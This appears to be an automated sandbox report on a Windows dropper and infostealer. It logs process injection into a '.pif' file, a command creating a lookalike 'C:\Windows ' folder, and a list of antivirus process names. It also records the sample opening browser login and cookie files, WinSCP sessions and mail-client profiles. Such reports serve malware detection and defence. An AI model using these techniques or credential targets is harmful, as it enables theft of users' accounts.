              Source: C:\Users\Public\Libraries\Clmgncrs.PIFMemory allocated: C:\Users\Public\Libraries\srcngmlC.pif base: 400000 protect: page execute and read and write
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFMemory allocated: C:\Users\Public\Libraries\srcngmlC.pif base: 1E090000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeSection unmapped: C:\Users\Public\Libraries\srcngmlC.pif base address: 400000Jump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection unmapped: C:\Users\Public\Libraries\srcngmlC.pif base address: 400000Jump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFSection unmapped: C:\Users\Public\Libraries\srcngmlC.pif base address: 400000
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeMemory written: C:\Users\Public\Libraries\srcngmlC.pif base: 24D008Jump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFMemory written: C:\Users\Public\Libraries\srcngmlC.pif base: 3BB008Jump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFMemory written: C:\Users\Public\Libraries\srcngmlC.pif base: 22C008
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeProcess created: C:\Users\Public\Libraries\srcngmlC.pif C:\Users\Public\Libraries\srcngmlC.pifJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir "\\?\C:\Windows " Jump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFProcess created: C:\Users\Public\Libraries\srcngmlC.pif C:\Users\Public\Libraries\srcngmlC.pifJump to behavior
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFProcess created: C:\Users\Public\Libraries\srcngmlC.pif C:\Users\Public\Libraries\srcngmlC.pif
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_029D5DDC
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: GetLocaleInfoA,0_2_029DB8C4
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: GetLocaleInfoA,0_2_029DB910
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_029D5EE8
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: GetLocaleInfoA,5_2_00417A20
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: GetLocaleInfoA,5_1_00417A20
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,6_2_02985DDC
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFCode function: GetLocaleInfoA,6_2_0298B910
              Source: C:\Users\Public\Libraries\Clmgncrs.PIFCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,6_2_02985EE7
              Source: C:\Users\Public\Libraries\srcngmlC.pifCode function: GetLocaleInfoA,8_2_00417A20
              Source: C:\Users\Public\Libraries\srcngmlC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\Public\Libraries\srcngmlC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
              Source: C:\Users\Public\Libraries\srcngmlC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\Public\Libraries\srcngmlC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\Public\Libraries\srcngmlC.pifQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_029DA30C GetLocalTime,0_2_029DA30C
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exeCode function: 0_2_02A395F8 GetVersion,0_2_02A395F8
              Source: C:\Users\Public\Libraries\srcngmlC.pifKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: cmdagent.exe
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: quhlpsvc.exe
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: avgamsvr.exe
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: TMBMSRV.exe
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: Vsserv.exe
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: avgupsvc.exe
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: avgemc.exe
              Source: SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000003.1676463086.000000007EB90000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1703293675.000000002104C000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.27062.13281.exe, 00000000.00000002.1706773444.000000007EE60000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000005.00000002.1851440244.0000000000820000.00000040.00000400.00020000.00000000.sdmp, Clmgncrs.PIF, 00000006.00000002.1837190492.000000000284B000.00000004.00001000.00020000.00000000.sdmp, srcngmlC.pif, 00000008.00000001.1833365375.0000000000820000.00000040.00000001.00020000.00000000.sdmp, srcngmlC.pif, 0000000C.00000001.1903364195.0000000000820000.00000040.00000001.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: MsMpEng.exe

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 12.2.srcngmlC.pif.3eeb5b90.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.31c600c6.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.34490ee8.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.32f65b90.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.34490ee8.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.34490000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.32f55b90.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.3da10fae.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.32f55b90.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.344a0ee8.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.34490000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.3da100c6.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.344a0ee8.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.34c10000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.409b0000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.31bd0fae.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.34b10000.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.3dce0ee8.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.3eeb5b90.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.3dce0ee8.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.344a0000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.32f65b90.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.31c60fae.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.31c60fae.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.31bd00c6.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.344a0000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.409b0000.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.3dce0000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.3da100c6.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.31bd0fae.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.3da10fae.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.31c600c6.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.31bd00c6.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.3dce0000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.34b10000.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.34c10000.9.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000008.00000002.1944048837.0000000034B10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2933159398.000000003DCE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2935316872.00000000409B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000003.1685796375.00000000301E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2932432191.000000003D9D0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.1942547850.0000000031F64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1877516776.0000000031C20000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.1942020419.0000000031B90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1879252508.00000000344A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1877750905.0000000031F54000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.1943713864.0000000034490000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1879908602.0000000034C10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2933322220.000000003DEB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000003.1906356857.000000003BEB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1879002850.0000000032F01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000003.1836003018.000000002FFFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.1943376162.0000000032F15000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2934529296.000000003EE61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: srcngmlC.pif PID: 5660, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: srcngmlC.pif PID: 6348, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: srcngmlC.pif PID: 6164, type: MEMORYSTR
              Source: Yara matchFile source: 8.2.srcngmlC.pif.400000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.400000.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.1.srcngmlC.pif.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.1.srcngmlC.pif.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.1.srcngmlC.pif.400000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.400000.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.400000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.1.srcngmlC.pif.400000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.1.srcngmlC.pif.400000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.1.srcngmlC.pif.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.400000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000001.1903364195.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1851440244.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1851440244.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2903058685.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000001.1903364195.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000001.1683699497.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2903058685.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000001.1833365375.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.1851440244.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.1918672427.0000000000450000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.1918672427.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000001.1683699497.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1705935072.000000007EA90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2903058685.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000001.1903364195.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000001.1833365375.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.1918672427.00000000004A0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.1683696452.000000007EA40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000001.1683699497.0000000000450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000001.1833365375.00000000004A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Users\Public\Libraries\srcngmlC.pifKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
              Source: C:\Users\Public\Libraries\srcngmlC.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Users\Public\Libraries\srcngmlC.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Users\Public\Libraries\srcngmlC.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\Users\Public\Libraries\srcngmlC.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\Users\Public\Libraries\srcngmlC.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
              Source: C:\Users\Public\Libraries\srcngmlC.pifFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Users\Public\Libraries\srcngmlC.pifFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\Public\Libraries\srcngmlC.pifFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\Public\Libraries\srcngmlC.pifFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
              Source: C:\Users\Public\Libraries\srcngmlC.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
              Source: C:\Users\Public\Libraries\srcngmlC.pifKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: Yara matchFile source: 12.2.srcngmlC.pif.3eeb5b90.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.31c600c6.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.34490ee8.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.32f65b90.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.34490ee8.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.34490000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.32f55b90.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.3da10fae.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.32f55b90.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.srcngmlC.pif.344a0ee8.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 8.2.srcngmlC.pif.34490000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.srcngmlC.pif.3da100c6.5.raw.unpack, type: UNPACKEDPE
